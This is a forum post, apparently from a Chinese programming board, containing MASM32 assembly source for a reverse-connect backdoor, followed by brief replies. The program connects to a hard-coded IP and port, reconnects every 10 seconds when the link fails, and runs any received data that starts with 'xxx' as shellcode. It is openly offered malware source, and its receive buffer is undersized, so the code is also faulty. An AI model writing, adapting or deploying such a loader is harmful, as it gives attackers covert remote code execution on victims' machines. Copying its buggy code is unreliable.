.386
.model   flat,stdcall
option   casemap:none
include   windows.inc
include   user32.inc
include   kernel32.inc
include   wsock32.inc
include   Ws2_32.inc
include        wininet.inc
include advapi32.inc
include     masm32.inc
includelib   user32.lib
includelib   kernel32.lib
includelib   wsock32.lib
includelib   Ws2_32.lib
includelib    wininet.lib
includelib advapi32.lib
includelib  masm32.lib

.data


  szMutex db "_Me?",0
  szIP    db "192.168.1.102",0
  port    db  "4410",0


.data?

  hMutex dd ?
  hInstance dd ?
   
   
  server        SOCKET    ?
  

    lpBuffer db ?

.code
cc proc;
jmp _PD;
cc endp
_xxx proc
xor eax,eax
lea eax,[lpBuffer+3]
call eax
   
    ret

_xxx endp
FZX   proc;防止重复运行的
   invoke GetModuleHandle,NULL
   mov hInstance,eax
   invoke CreateMutex,NULL,TRUE,offset szMutex
   mov hMutex,eax
   invoke GetLastError             ;  获得最后发生的错误编号
   cmp eax,ERROR_ALREADY_EXISTS  ; 已经存在
  jz @F
   invoke    Sleep,1000
   call _LJ
      invoke ReleaseMutex,hMutex         ;只有在正常运行后才释放Mutex对象
   @@:
   invoke ExitProcess,0
   ret
FZX   endp


_PD PROC

pushad

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;循环处理客户消息命令
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.while    TRUE
invoke RtlZeroMemory,addr lpBuffer,sizeof lpBuffer
invoke    recv,server,addr lpBuffer,1024,0
.break    .if    eax==SOCKET_ERROR


.if    lpBuffer=="x";lpBuffer是接收到的命令
.if    [lpBuffer+1]=="x"
.if    [lpBuffer+2]=="x";判断头文件是否是XXX是就执行shellcode代码
push cc
assume fs:nothing  
push dword ptr fs:[0]
mov dword ptr fs:[0],esp


call _xxx

.endif   
.endif
.endif   
popad
.endw
popad   
_PD    endp
_LJ    proc;开始连接服务器
        local    @stData:WSADATA
        local    @temp:SOCKET
        local    @stAddr:sockaddr_in
                local    @dwRecv,ThreadId4   
     invoke WSAStartup, 101h, addr @stData
         invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0
           mov server, eax
           mov @stAddr.sin_family, 2
         invoke atodw, addr port
         invoke htons, eax
           mov @stAddr.sin_port, ax
         invoke gethostbyname, addr szIP
          mov eax, [eax+12]
          mov eax, [eax]
          mov eax, [eax]
          mov @stAddr.sin_addr, eax
        
kkk:   
      invoke connect,server,addr @stAddr,sizeof @stAddr
      .if eax==SOCKET_ERROR
      invoke    Sleep,10000
      jmp kkk;如果连接失败就重新连接！
      .endif

CALL _PD;判断收到的命令  
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.if    server!=INVALID_SOCKET
        invoke    closesocket,server
      
.endif
    invoke    WSACleanup
    mov    eax,TRUE
    invoke Sleep,10000
JMP _LJ;如果服务器断开了连接就重新连接
    ret        
_LJ    endp
start:
call    FZX
invoke ExitProcess,0
ret
end    start

[ 本帖最后由 dgz333 于 2012-11-26 19:08 编辑 ]

顶  

这个你要干嘛

我知道断开了连接的话

必须从新socket套接子在bind